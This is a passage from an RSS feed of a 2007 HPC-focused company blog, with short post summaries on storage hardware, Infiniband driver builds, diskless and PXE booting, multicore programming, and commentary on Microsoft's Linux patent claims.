      <description>Well, looks like it works. The relevant directory is http://downloads.scalableinformatics.com/downloads/OFED-1.2-rc2/OpenSuSE10.2/ and you need to install the kernel before you install the RPMs. Note that you will have to run mkinitrd by hand (very easy, just &amp;ldquo;mkinitrd&amp;rdquo;), and add it into /boot/grub/menu.lst . This is again, very easy to do.
Also, as I am a strong proponent of yum, this is a &amp;ldquo;yumable&amp;rdquo; path [OFED-1.2-rc2-OpenSuSE10.2] Name=OFED 1.2-rc2 for OpenSuSE 10.2 baseurl=http://downloads.scalableinformatics.com/downloads/OFED-1.2-rc2/OpenSuSE10.2/ enabled=1 which should let you do a yum install ibtools and other bits.</description>
    </item>
    
    <item>
      <title>Concern over drive failure rates</title>
      <link>https://blog.scalability.org/2007/06/concern-over-drive-failure-rates/</link>
      <pubDate>Fri, 08 Jun 2007 12:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/concern-over-drive-failure-rates/</guid>
      <description>Our JackRabbit storage unit uses lots of hard disks. The larger unit uses 48 drives in a 5U rack mount chassis. We selected and used the Seagate 750 GB NL drives for the unit, giving it a whopping 36 TB fully configured, with absolutely industry leading performance, density, etc. This is not a JackRabbit commercial, we are proud of our little L. Flavigularis though &amp;hellip; My concern is drive failure rates.</description>
    </item>
    
    <item>
      <title>The danger of monoculture</title>
      <link>https://blog.scalability.org/2007/06/the-danger-of-monoculture/</link>
      <pubDate>Fri, 08 Jun 2007 02:29:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-danger-of-monoculture/</guid>
      <description>Those with anti-Microsoft postures might think this will be a missive about Microsoft. It is not. Microsoft will not be mentioned here apart from these two sentances.
The monoculture to which I refer is that of building dependencies upon particular packaging mechanisms in open source tools, or upon specific distributions. We are trying to build OFED-1.x for OpenSuSE 10.2 in order to provide Infiniband driver support to a customer&amp;rsquo;s cluster. OFED supports RPM distributions, specifically highly specific versions from RedHat and SuSE.</description>
    </item>
    
    <item>
      <title>Google snaps up Peakstream</title>
      <link>https://blog.scalability.org/2007/06/google-snaps-up-peakstream/</link>
      <pubDate>Wed, 06 Jun 2007 12:25:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/google-snaps-up-peakstream/</guid>
      <description>whoa. This one I did not see coming. It suggests that Google is serious about performance, and possibly, providing performance to its customers using tools such as PeakStream to provide acceleration. Google into acceleration. With a huge distributed supercomputer.
Hmmm&amp;hellip;.. I wonder if the VCs out there can take time from the next Web 3.0 picture upload site or repackaged open source group to think about this. Nah. Overall, if you can provide high performance tools for reasonable prices (marginal cost above existing system prices), you have value.</description>
    </item>
    
    <item>
      <title>Extraordinarily cool</title>
      <link>https://blog.scalability.org/2007/06/extraordinarily-cool/</link>
      <pubDate>Mon, 04 Jun 2007 03:17:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/extraordinarily-cool/</guid>
      <description>Was finally able to get Feisty booted diskless. It is running in a VMWare server session. See the picture below.
[ ](http://scalability.org/images/diskless-ubuntu-in-vmware.png)
Not perfect, need to clean up the mounts a bit, and fix up some other things, but this is the right direction for us. Quite happy about this.</description>
    </item>
    
    <item>
      <title>Updated RSS</title>
      <link>https://blog.scalability.org/2007/06/updated-rss/</link>
      <pubDate>Sun, 03 Jun 2007 12:57:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/updated-rss/</guid>
      <description>let me know if it breaks anything &amp;hellip;</description>
    </item>
    
    <item>
      <title>OT: missing the point</title>
      <link>https://blog.scalability.org/2007/06/ot-missing-the-point/</link>
      <pubDate>Sun, 03 Jun 2007 12:31:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ot-missing-the-point/</guid>
      <description>I use Linux on my laptop. Have for years. Use lots of business tools there. Browse web pages with firefox, get email with thunderbird. Create, modify, finalize, present &amp;ldquo;office&amp;rdquo; documents (Excel spreadsheets, powerpoint presentations, Word documents). Watch video clips (legal), DVDs (legal), etc. It makes for a great platform for these things. Stable, fast, virus free.
One of my big complaints about dealing with web pages has been the propensity to code to IE-whatever.</description>
    </item>
    
    <item>
      <title>Cool...</title>
      <link>https://blog.scalability.org/2007/05/cool/</link>
      <pubDate>Wed, 30 May 2007 12:38:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/cool/</guid>
      <description>Surface computing. I can see uses for this, in HPC and analytics, not to mention tele/remote medicine, science/engineering &amp;hellip; Kudos to Microsoft. This should be quite cool.</description>
    </item>
    
    <item>
      <title>diskless ...</title>
      <link>https://blog.scalability.org/2007/05/diskless/</link>
      <pubDate>Tue, 29 May 2007 21:04:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/diskless/</guid>
      <description>still not behaving with Ubuntu 7.04 or 6.10. In 6.10, at least it gets the nfs-premount scripts, and then tries (and fails, due to a missing colon) the /root directory from the NFS server. Reminds me of the autoinst days of long past. Took a while to figure out how to get Irix booted diskless, but once that happened and I could do it reliably, the rest was easy&amp;hellip;. er &amp;hellip; yeah&amp;hellip; easy.</description>
    </item>
    
    <item>
      <title>PXE Boot OS and configuration</title>
      <link>https://blog.scalability.org/2007/05/pxe-boot-os-and-configuration/</link>
      <pubDate>Mon, 28 May 2007 19:50:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/pxe-boot-os-and-configuration/</guid>
      <description>Our systems install via PXE boot whenever possible. Much faster than DVD/CD, floppies and alike. I have been fighting with PXELINUX (part of the excellent SYSLINUX package of boot loaders with menus) trying to get it working the way I want it to. This is important for JackRabbit and our compute clusters.
Of course I was using the native SYSLINUX package, something around version 2.09 or something like that. I had pxegrub loading, but then it would basically hang while working with the network.</description>
    </item>
    
    <item>
      <title>lightcones, filesystems and messages, and large distributed clusters with non-infinite bandwidth and finite latency</title>
      <link>https://blog.scalability.org/2007/05/lightcones-filesystems-and-messages-and-large-distributed-clusters-with-non-infinite-bandwidth-and-finite-latency/</link>
      <pubDate>Mon, 28 May 2007 05:57:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/lightcones-filesystems-and-messages-and-large-distributed-clusters-with-non-infinite-bandwidth-and-finite-latency/</guid>
      <description>A point I try to make to customers at the day job is that, as you scale up a systems size, your design will need to scale as well. And this begs the question. How will it need to change?
Currently (May 2007) simple NFS suffers from 1/N problems (1/N meaning that as the average number of requesters N increases, the average available fixed resource available per requester works out to about 1/N &amp;hellip; modulo duty cycles, transients, etc).</description>
    </item>
    
    <item>
      <title>language&#43;&#43;</title>
      <link>https://blog.scalability.org/2007/05/language/</link>
      <pubDate>Sun, 27 May 2007 23:34:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/language/</guid>
      <description>Ok, it hit me today. I know what I want, or at least in part, in a language. I do not want to write loops. I want to write something like this:
range: i=1 .. N; a[i] = b[i]+c*d[i]; You don&amp;rsquo;t see any explicit &amp;ldquo;for&amp;rdquo; loops. No explicit control structures. The rationale I have for this is that without an explicit set of control structures, the compiler is freer to transform the code to match the underlying machine architecture.</description>
    </item>
    
    <item>
      <title>Nail, hammer, hit hit hit ...</title>
      <link>https://blog.scalability.org/2007/05/nail-hammer-hit-hit-hit/</link>
      <pubDate>Sun, 27 May 2007 19:41:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/nail-hammer-hit-hit-hit/</guid>
      <description>Michael Suess over at the always interesting Thinking Parallel blog wrote a number of interesting pieces recently. I would suggest a trip over there to read some of them. I must thank him at some point for pointing to us as part of his &amp;ldquo;you are what you read&amp;rdquo; post. We aren&amp;rsquo;t on an anti-Microsoft spree, and I am not trying to &amp;ldquo;kill&amp;rdquo; them. I am being skeptical about their motives, and noting that there are alternative and simpler explanations for their actions.</description>
    </item>
    
    <item>
      <title>Ill-behaved web-crawlers</title>
      <link>https://blog.scalability.org/2007/05/ill-behaved-web-crawlers/</link>
      <pubDate>Sun, 27 May 2007 19:10:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ill-behaved-web-crawlers/</guid>
      <description>This is not about HPC. I look at our logs every now and then to see if we have problems which aren&amp;rsquo;t normally covered in monitoring scenarios. Looking over the web logs, I see the usual usage, and bots. Some bots have been poorly behaved, some are quite intelligent. Google&amp;rsquo;s are pretty good.
So are many of the others. A group of them are very poor web-denizens, who seem to be incapable of understanding the links they see, and blindly follow them.</description>
    </item>
    
    <item>
      <title>Ahhh ... the business rationale becomes clear ...</title>
      <link>https://blog.scalability.org/2007/05/ahhh-the-business-rationale-becomes-clear/</link>
      <pubDate>Sun, 27 May 2007 14:51:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ahhh-the-business-rationale-becomes-clear/</guid>
      <description>From John West&amp;rsquo;s InsideHPC blog I found a link to a link to a paper on a Microsoft site. This paper starts out with lofty goals
Sounds great, they are going to teach us a set of best practices for HPC. Cool. I like learning new things, so this should be helpful. They continue a little later on &amp;hellip;
Hmmm&amp;hellip; If they think HPC is all about solutions can be used to crunch complex mathematical problems in a variety of area, then we have a problem.</description>
    </item>
    
    <item>
      <title>The story that will not go away</title>
      <link>https://blog.scalability.org/2007/05/the-story-that-will-not-go-away/</link>
      <pubDate>Thu, 24 May 2007 23:28:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/the-story-that-will-not-go-away/</guid>
      <description>The Register reports that Microsoft is
uh&amp;hellip; yeah. This whole thing bothers me. Because it means that Microsoft is implying that anyone in HPC using Linux is a thief, stealing and using Microsoft intellectual property without paying Microsoft for the privilege. Neat strategy. &amp;ldquo;Use our stuff and we won&amp;rsquo;t sue&amp;rdquo;.
I can&amp;rsquo;t believe that I am the only one that finds this offensive. Somewhat more odious than their initial marketing message of &amp;ldquo;now HPC is mainstream.</description>
    </item>
    
    <item>
      <title>Compilers</title>
      <link>https://blog.scalability.org/2007/05/compilers/</link>
      <pubDate>Thu, 24 May 2007 18:22:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/compilers/</guid>
      <description>I like the intel compilers. The generate nice code on intel platforms. The problem is when you use them for your product, you only get good code for intel platforms. The resulting code winds up being slow in many cases on Opterons. Which is not good.
I have been talking about this point for a while. There are hacks you can use with your intel generated code to take out the specific processor test cases, and just run them on opterons, and surprise, they run often better than without those hacks.</description>
    </item>
    
    <item>
      <title>How do you program N cores (as N -&gt; infinity)</title>
      <link>https://blog.scalability.org/2007/05/how-do-you-program-n-cores-as-n-infinity/</link>
      <pubDate>Thu, 24 May 2007 18:12:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/how-do-you-program-n-cores-as-n-infinity/</guid>
      <description>I have been touching on some of the aspects of this in various posts here recently. Basically you have 2 roughly related technologies to work with today. Shared memory (OpenMP) and distributed memory (MPI). Sure there are others, but these dominate. But there is a problem with these.
In the case of OpenMP, you annotate your source, and the compiler does the work. But it only does the work assuming you have a shared memory system.</description>
    </item>
    
    <item>
      <title>... and receive and receive ...</title>
      <link>https://blog.scalability.org/2007/05/and-receive-and-receive/</link>
      <pubDate>Wed, 23 May 2007 02:21:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/and-receive-and-receive/</guid>
      <description>What a day for 10GbE. Ask a question. Get a few answers. Inexpensive NICs are good. So are inexpensive switches. Have a look at Woven systems.</description>
    </item>
    
    <item>
      <title>Ask, and ye shall receive</title>
      <link>https://blog.scalability.org/2007/05/ask-and-ye-shall-receive/</link>
      <pubDate>Tue, 22 May 2007 02:38:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ask-and-ye-shall-receive/</guid>
      <description>I asked earlier today where the 10GbE was, noting that NICs were horribly expensive, and switches were bad as well. Well, I just read this which suggests the Mellanox will be sourcing chips to builders for reasonable pricing. Now only if CX-4 weren&amp;rsquo;t so expensive &amp;hellip;</description>
    </item>
    
    <item>
      <title>Can you say ... &#34;backfire&#34; ?</title>
      <link>https://blog.scalability.org/2007/05/can-you-say-backfire/</link>
      <pubDate>Tue, 22 May 2007 02:29:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/can-you-say-backfire/</guid>
      <description>Over at Digital Tipping Point we see something quite interesting. The blog author has set up a list for people to sign up to be sued by Microsoft for patent infringement. Now you might think I mean &amp;ldquo;backfire&amp;rdquo; as in these people are nuts. This is not what I mean.
What I mean is that the patent threats have managed to open up a whole new front, one that has surprised me, as I did not think of it.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, 10GbE?</title>
      <link>https://blog.scalability.org/2007/05/wherefore-art-thou-10gbe/</link>
      <pubDate>Mon, 21 May 2007 12:26:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/wherefore-art-thou-10gbe/</guid>
      <description>For quite a while, we have been hearing about how great 10GbE is. I like the idea, it is just ethernet. Plug it in (with CX-4 &amp;hellip; ) and off you go.
There is only a small number of flys in this particular ointment. Cost: Per port costs of 10GbE are huge. The NICs are running in the thousands of USD ($), and the switches &amp;hellip; well &amp;hellip; lets not go there.</description>
    </item>
    
    <item>
      <title>WinXP x64</title>
      <link>https://blog.scalability.org/2007/05/winxp-x64/</link>
      <pubDate>Mon, 21 May 2007 01:10:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/winxp-x64/</guid>
      <description>Loaded it on two &amp;ldquo;desktop&amp;rdquo; systems for a customer evaluation. Well these are desktops in name only. Smaller than the other ferocious beasts we finished building last week, but still &amp;hellip;
The small ones are a dual dual-core Opteron 2220 system with 8 GB ram, and 1 TB of fast disk, and a dual quad core Clovertown 5310 unit with 8 GB ram, and 1 TB of fast disk. Only differences were processor, motherboard, and RAM type, the rest of the specs were the same.</description>
    </item>
    
    <item>
      <title>Opting for the sane strategy</title>
      <link>https://blog.scalability.org/2007/05/opting-for-the-sane-strategy/</link>
      <pubDate>Wed, 16 May 2007 01:43:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/opting-for-the-sane-strategy/</guid>
      <description>Lots of people called this for what it was. FUD. Pure and simple. Marketing by threatened litigation. This evening, information-week posted more discussion, including Linus Torvalds viewpoint. Not so oddly enough, his view was quite similar with my thoughts. That wasn&amp;rsquo;t what struck me. It was the backpedaling.
My thoughts are, simply put, what utter hogwash. Their comments were a carefully prepared shot across the bow. It was meant to have marketing impact.</description>
    </item>
    
    <item>
      <title>State of the FUD, day 3, morning</title>
      <link>https://blog.scalability.org/2007/05/state-of-the-fud-day-3-morning/</link>
      <pubDate>Tue, 15 May 2007 13:51:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/state-of-the-fud-day-3-morning/</guid>
      <description>This morning, more &amp;ldquo;coverage&amp;rdquo; (being generous here). First USA Today tells us that &amp;ldquo;Microsoft details patent breaches.&amp;quot; This seems to be a new definition of the word &amp;ldquo;detail&amp;rdquo;, one that I am not quite familiar with. Detail usually means &amp;ldquo;extended treatment of or attention to particular items&amp;rdquo;. The definition of detail for the USA today piece appears to be different. No details on patents. Just &amp;ldquo;counts&amp;rdquo;. Moreover, the article indicates that</description>
    </item>
    
    <item>
      <title>FUD update, day 2</title>
      <link>https://blog.scalability.org/2007/05/fud-update-day-2/</link>
      <pubDate>Tue, 15 May 2007 02:42:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/fud-update-day-2/</guid>
      <description>Well, we seem to not have been the only ones to notice the problems with the arguments made by Microsoft legal. Larry Augustin, of VA Linux fame, wrote a response that is worth reading. In it he basically says &amp;ldquo;put them up (the allegedly infringed patents, and where the infringing code/design is), or shut up.&amp;rdquo; The critical &amp;ldquo;money&amp;rdquo; quote is
That is the point after all. Super-secret evidence. Reminds me of the Animal House movie.</description>
    </item>
    
    <item>
      <title>Locality and centrality in massive computing and storage systems</title>
      <link>https://blog.scalability.org/2007/05/locality-and-centrality-in-massive-computing-and-storage-systems/</link>
      <pubDate>Mon, 14 May 2007 01:43:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/locality-and-centrality-in-massive-computing-and-storage-systems/</guid>
      <description>Here we are in the age of the cluster and grid, with distributed shared nothing approaches to processing cycles, and we collectively have this rather ironic fixation on shared file systems. This is amusing as one of the critical arguments for distributed computing is that, in aggregate, N processors provides N times the number of processing cycles that 1 processor can provide, and shared resources are contended for resources (e.g. bottlenecks).</description>
    </item>
    
    <item>
      <title>If your competitor beats you in the marketplace, then FUD, FUD, FUD</title>
      <link>https://blog.scalability.org/2007/05/if-your-competitor-beats-you-in-the-marketplace-then-fud-fud-fud/</link>
      <pubDate>Mon, 14 May 2007 01:11:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/if-your-competitor-beats-you-in-the-marketplace-then-fud-fud-fud/</guid>
      <description>What do you do when a competitor encroaches upon your cash cows, starts usurping deals, demonstrates unbeatable TCO, infinitely better acquisition cost, better security and resilience to attacks? You FUD them of course. FUD being the act of creating Fear, Uncertainty, and Doubt about them. Say, for example, dangling the possibility of lawsuits against users of the competitors products. Scare your customers, scare their customers.
And how do you do this?</description>
    </item>
    
    <item>
      <title>Updated mkchbond.pl</title>
      <link>https://blog.scalability.org/2007/05/updated-mkchbondpl/</link>
      <pubDate>Sun, 06 May 2007 20:40:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/updated-mkchbondpl/</guid>
      <description>Our mkchbond.pl script automates the creation of channel bond entries in Redhat and now SuSE Linux. Its primary reason for existing is to automate a process that is editing intensive, and somewhat annoying. It also provides dry runs by default, you have to tell it to &amp;ndash;write a file before it will touch anything.
For example: to create a 4 way channel bond named bond0 out of eth2, eth3, eth4, eth5, with an IP address of the bond as 192.</description>
    </item>
    
    <item>
      <title>Worth a read</title>
      <link>https://blog.scalability.org/2007/05/worth-a-read/</link>
      <pubDate>Wed, 02 May 2007 16:19:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/worth-a-read/</guid>
      <description>Have a look at this link. We have pointed out that Microsoft has had a great opportunity to a) do the right thing, b) do it in a multiplatform manner. Would make lots of customers/end users happy. Lower barriers and all that.
Unfortunately, I am not sure Microsoft quite grasps that this is why clusters are so powerful, or why Open Source is so widely used. Its all about the barriers, and getting around them.</description>
    </item>
    
    <item>
      <title>Accelerated computing appliances</title>
      <link>https://blog.scalability.org/2007/05/accelerated-computing-appliances/</link>
      <pubDate>Tue, 01 May 2007 12:31:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/accelerated-computing-appliances/</guid>
      <description>Having spoken with quite a number of potential/current customers on this topic, we had been assured that end users were largely disinterested in expensive single point-function computing devices. They wanted inexpensive, and fast, and reusable for other things. 10x current platform performance for well under 10k$US was what really stuck out in our responses to inquiries.
Of course, this was over the last several years, and you get 10x from Moore&amp;rsquo;s law advances every 5-6 years, so you can always just wait.</description>
    </item>
    
    <item>
      <title>Looking for needles in haystacks, and other quixotic pasttimes</title>
      <link>https://blog.scalability.org/2007/04/looking-for-needles-in-haystacks-and-other-quixotic-pasttimes/</link>
      <pubDate>Fri, 27 Apr 2007 16:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/looking-for-needles-in-haystacks-and-other-quixotic-pasttimes/</guid>
      <description>I have been wanting to get CCS adoption data. It helps us understand whether this is a viable target for software development, and whether or not we want to invest limited resources in it. We had been asked previously by Microsoft to &amp;ldquo;benchmark&amp;rdquo; applications, though they seem to have missed our point about porting the applications to run fast natively before we benchmark.
Regardless, we want to see if others have been adopting the platform.</description>
    </item>
    
    <item>
      <title>Spring special for the 24 TB JackRabbit</title>
      <link>https://blog.scalability.org/2007/04/spring-special-for-the-24-tb-jackrabbit/</link>
      <pubDate>Thu, 26 Apr 2007 04:33:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/spring-special-for-the-24-tb-jackrabbit/</guid>
      <description>Spring is almost here &amp;hellip; in Michigan. Its not cold enough to snow, but not warm enough for trees and plants to bloom. That means that it is time for rabbits to go forth and multiply. With this in mind, in honor of the new product offering, Scalable Informatics JackRabbit 24 TB storage systems are available from Scalable Informatics and partners for $23,830. This is less than $1/GB for a system demonstrating more than 1 GB/s performance on standard IO test cases.</description>
    </item>
    
    <item>
      <title>JackRabbit benchmark report is up</title>
      <link>https://blog.scalability.org/2007/04/jackrabbit-benchmark-report-is-up/</link>
      <pubDate>Wed, 18 Apr 2007 13:27:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/jackrabbit-benchmark-report-is-up/</guid>
      <description>Have a look here. Performance is excellent.
[ ](http://scalability.org/images/JR-benchmark-picture.jpg)</description>
    </item>
    
    <item>
      <title>High Performance Computing Acceleration White Paper</title>
      <link>https://blog.scalability.org/2007/04/high-performance-computing-acceleration-white-paper/</link>
      <pubDate>Mon, 09 Apr 2007 23:36:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/high-performance-computing-acceleration-white-paper/</guid>
      <description>We worked on this white paper back at the end of December for AMD. We have significant data that goes along with it, very interesting data, that shows nicely that software and software+hardware accelerated applications can scale. The white paper is here or you can pull it from the AMD site.
[ ](http://www.scalableinformatics.com/public/AccComp_WP.pdf)
There are a few editing mistakes in it, but apart from that, it is an overview of acceleration as it exists today.</description>
    </item>
    
    <item>
      <title>The importance of scaling down (as well as up)</title>
      <link>https://blog.scalability.org/2007/04/the-importance-of-scaling-down-as-well-as-up/</link>
      <pubDate>Sat, 07 Apr 2007 04:13:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/the-importance-of-scaling-down-as-well-as-up/</guid>
      <description>We had some conversations recently with customers about JackRabbit solutions that suggested what we thought as our small configuration was in fact too large. This was an eye-opener.
This group has particular needs well suited to the design, but they have to keep the system costs down, and are willing to trade some aspects of design for cost. So we worked on it, and came out with a unit that should be able to provide about 8 TB for about 9k$ US.</description>
    </item>
    
    <item>
      <title>As systems scale up, hard problems are exposed</title>
      <link>https://blog.scalability.org/2007/04/as-systems-scale-up-hard-problems-are-exposed/</link>
      <pubDate>Sat, 07 Apr 2007 04:05:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/as-systems-scale-up-hard-problems-are-exposed/</guid>
      <description>You have a 4 node cluster. You want to share data among the nodes. Pretend it is a &amp;ldquo;desktop&amp;rdquo; machine. Fine. Setup NFS. Or Samba/CIFS. Share the data. End of story. But this doesn&amp;rsquo;t work as well when you get to 40 nodes, and starts failing badly at 400. At 4000 nodes, well, you need a special filesystem design. What happened? Why when we scale up do problems arise?
Well, you have several factors.</description>
    </item>
    
    <item>
      <title>Added a view counter and other blogging bits</title>
      <link>https://blog.scalability.org/2007/04/added-a-view-counter-and-other-blogging-bits/</link>
      <pubDate>Mon, 02 Apr 2007 18:47:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/added-a-view-counter-and-other-blogging-bits/</guid>
      <description>Won&amp;rsquo;t grab historical data, just stuff going forward &amp;hellip;</description>
    </item>
    
    <item>
      <title>Some see an augering in, some see opportunity</title>
      <link>https://blog.scalability.org/2007/03/some-see-an-augering-in-some-see-opportunity/</link>
      <pubDate>Fri, 30 Mar 2007 02:28:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/some-see-an-augering-in-some-see-opportunity/</guid>
      <description>My day job is at a company in the Metro Detroit area. Metro Detroit, and actually Michigan in general is a very nice state. This is a good place. There are good people here. Prices are reasonable, cost of living isn&amp;rsquo;t terrible, and for the moment, taxes are under control.
The problem is that the area is completely dependent upon the fortunes of the US auto manufacturers. Since manufacturing continues its effort to seek out and use the lowest cost systems, Metro Detroit and Michigan will continue to hemorrhage jobs in this area.</description>
    </item>
    
    <item>
      <title>Looks nice, but I still worry about memory contention</title>
      <link>https://blog.scalability.org/2007/03/looks-nice-but-i-still-worry-about-memory-contention/</link>
      <pubDate>Fri, 30 Mar 2007 01:05:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/looks-nice-but-i-still-worry-about-memory-contention/</guid>
      <description>Intel announced some details on Penryn and others today. It looks like a sweet chip. The problem I am having is, if the Clovertown is memory bus bound with 4 cores (2 x 2-core chips) for a number of memory intensive workloads, won&amp;rsquo;t 8+ cores be worse? Think of this in terms of public expenditure and return on investment. If something you are investing more money in isn&amp;rsquo;t giving you the return you want/need, doesn&amp;rsquo;t it make sense to stop throwing more money at it?</description>
    </item>
    
    <item>
      <title>PeakStream Announces Availability of PeakStream Workstation for Microsoft Windows(R) Edition beta</title>
      <link>https://blog.scalability.org/2007/03/peakstream-announces-availability-of-peakstream-workstation-for-microsoft-windowsr-edition-beta/</link>
      <pubDate>Tue, 27 Mar 2007 18:22:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/peakstream-announces-availability-of-peakstream-workstation-for-microsoft-windowsr-edition-beta/</guid>
      <description>REDWOOD CITY, Calif.-(Business Wire)-March 27, 2007 - PeakStream, Inc., a leading software application platform provider for the high performance computing (HPC) market, today announced its innovative PeakStream Platform(TM) is now available in beta version for Microsoft Windows.PeakStream Workstation(TM) for Microsoft Windows(R) Edition allows software developers to easily program new high performance processors such as multi-core CPUs and graphics processor units (GPUs) directly on their desktops. Now, programmers working with Windows can enjoy the same advantages that their Linux-based counterparts have been benefiting from since the PeakStream Platform&amp;rsquo;s initial launch last September: the ability to develop technical and scientific applications faster, and run them at higher performance, using their existing tools and programming languages.</description>
    </item>
    
    <item>
      <title>Final sprint before shipping</title>
      <link>https://blog.scalability.org/2007/03/final-sprint-before-shipping/</link>
      <pubDate>Mon, 26 Mar 2007 20:00:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/final-sprint-before-shipping/</guid>
      <description>Now that I (think) understand most of the major issues here, and I can be reasonably sure that I have a good grasp of the tuning, I think I want to take it out on the test track and give it one final once over. Lets open the throttle. Wide.
I can tune the IO scheduler, number of outstanding IO requests (for sorting), various buffer cache, and the works. I now have the clock left alone (need to set it that way by default), so it is running full speed.</description>
    </item>
    
    <item>
      <title>powernow considered harmful (to benchmarking)</title>
      <link>https://blog.scalability.org/2007/03/powernow-considered-harmful-to-benchmarking/</link>
      <pubDate>Mon, 26 Mar 2007 14:29:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/powernow-considered-harmful-to-benchmarking/</guid>
      <description>I had an interesting epiphany over the last few days. We normally turn on powernow to let idle machines &amp;hellip; idle &amp;hellip; during low load times. This way they consume less power.
Of course, the road to penultimate benchmark results are paved with such good intentions. I noticed that when run this way, several CPU/memory/IO benchmarks didn&amp;rsquo;t always hit the throttle on the CPU. It remained clocked lower. Which meant I was getting very odd buffer cache timing, that I could not quite grok.</description>
    </item>
    
    <item>
      <title>WinCE-ing</title>
      <link>https://blog.scalability.org/2007/03/wince-ing/</link>
      <pubDate>Sun, 25 Mar 2007 03:50:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/wince-ing/</guid>
      <description>So I have a &amp;ldquo;new&amp;rdquo; phone. Long story, not worth going into. It runs Windows CE. My Palm Treo 650 was frustrating (PalmOS is inconsistent, and largely broken, missing important things &amp;hellip; and it crashed &amp;hellip; occasionally wiping out the email program and all settings). If anyone from Palm is reading this, please understand that I have every intention of avoiding your future products. For a very good reason. This phone looked better than mine from a feature perspective.</description>
    </item>
    
    <item>
      <title>Linux advertisment from Novell</title>
      <link>https://blog.scalability.org/2007/03/linux-advertisment-from-novell/</link>
      <pubDate>Sat, 24 Mar 2007 14:50:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/linux-advertisment-from-novell/</guid>
      <description>Amusing&amp;hellip; Of course there is more than a little grain of truth to it, even though it is marketing. And there is a second &amp;ldquo;ad&amp;rdquo; here, and a third. Update: Ok, this is something I don&amp;rsquo;t quite get. I have done some searching for market share data for Linux. Why not, it is of some interest to know what customers want and are interested in using. Almost all the &amp;ldquo;data&amp;rdquo; I have seen puts Linux penetration into the noise.</description>
    </item>
    
    <item>
      <title>New JackRabbit site is up</title>
      <link>https://blog.scalability.org/2007/03/new-jackrabbit-site-is-up/</link>
      <pubDate>Wed, 21 Mar 2007 12:50:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/new-jackrabbit-site-is-up/</guid>
      <description>Finally, hunkered down, did a less is more approach. See http://jackrabbit.scalableinformatics.com. Or this link. Getting content up there in bits and pieces. Working on the most requested bits, the updated benchmark reports. Update: As I have discovered, some people are ideologically opposed to telling us who they are before they read the papers. Fair enough. Will give them incentives. Go to the links, pull them down, and if you like them and possibly buy them from Scalable (or our partners) we will provide a discount if your correct name/email/phone data is in the database.</description>
    </item>
    
    <item>
      <title>This is wrong, so very wrong</title>
      <link>https://blog.scalability.org/2007/03/this-is-wrong-so-very-wrong/</link>
      <pubDate>Wed, 21 Mar 2007 12:44:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/this-is-wrong-so-very-wrong/</guid>
      <description>When you update your computer, get patches, you assume (and this may be the hard part) that the people putting out the patches respect your efforts to keep your system secure. Of course, some like checking every few weeks if your system is &amp;ldquo;genuine&amp;rdquo;. You know that they would never, ever waste your time and effort on pushing a marketing program as a patch. Never. Ever.

Because it would be wrong.</description>
    </item>
    
    <item>
      <title>Paid my Microsoft tax today ...</title>
      <link>https://blog.scalability.org/2007/03/paid-my-microsoft-tax-today/</link>
      <pubDate>Sun, 18 Mar 2007 22:50:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/paid-my-microsoft-tax-today/</guid>
      <description>Yes, for a number of reasons, we needed to get another laptop (good reasons, we are growing, and our new person needs it).
Unfortunately, it is pretty close to impossible to find a laptop without Vista. I would prefer XP Pro out of all the Microsoft products. It does appear that HP will be offering laptops with SuSE on them, and hopefully Dell will be offering them with Ubuntu and others.</description>
    </item>
    
    <item>
      <title>The 3-day IOzone test ...</title>
      <link>https://blog.scalability.org/2007/03/the-3-day-iozone-test/</link>
